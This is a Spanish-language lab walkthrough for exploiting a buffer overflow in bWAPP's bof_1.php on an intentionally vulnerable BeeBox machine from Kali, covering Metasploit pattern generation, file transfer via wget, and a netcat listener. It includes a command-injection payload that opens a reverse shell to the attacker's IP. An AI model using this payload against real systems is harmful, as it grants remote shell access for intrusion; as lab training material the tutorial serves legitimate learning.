Este ejercicio tiene como objetivo aprender a identificar y explotar vulnerabilidades de buffer overflow. A través de este proyecto entenderás cómo los desbordamientos de buffer pueden ser utilizados para ejecutar código arbitrario, así como a aplicar técnicas de explotación para comprometer la seguridad de la aplicación.
Verifica que tanto Kali Linux como BeeBox estén conectadas en la misma red. Puedes hacer esto comprobando las direcciones IP asignadas a cada máquina y asegurándote de que pueden comunicarse entre sí.
Verifica la conectividad. Desde Kali, intenta hacer ping a BeeBox y viceversa para confirmar que la conexión de red está funcionando.
1ping [IP-DE-BEEBOX] 2ping [IP-DE-KALI]
Inicia sesión en la máquina BeeBox.
Encuentra el hash relacionado con la vulnerabilidad (esto puede ser parte de la configuración o el código).
Ingresa un nombre de película que esté en la base de datos de bWAPP (por ejemplo, Hulk, Iron Man).
Luego ingresa un nombre de película que no esté en la base de datos (por ejemplo, Harry Potter).
Ejecuta el siguiente comando para ver el contenido del archivo bof_1.php
:
1cat /var/www/bWAPP/bof_1.php
El objetivo es entender cómo se maneja el input del título de la película y cómo se pasa como argumento de línea de comandos a la aplicación. Busca indicios de desbordamiento de búfer.
1 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360
pattern_chain.txt
:1 echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt
1python3 -m http.server 8080
pattern_chain.txt
en BeeBox usando wget
:1wget http://[IP-DE-KALI]:8080/pattern_chain.txt
1cat pattern_chain.txt
pattern_create.rb
en el campo o parámetro que pueda causar el desbordamiento de búfer en bWAPP.El objetivo seria ver cómo responde la aplicación a una entrada que excede el tamaño esperado.
1nc -lvnp 4444
1 $(nc -e /bin/bash [IP-DE-KALI] 4444)
Reemplaza
[IP-DE-KALI]
con la dirección IP de tu máquina Kali.
1sudo cat /var/log/apache2/error.log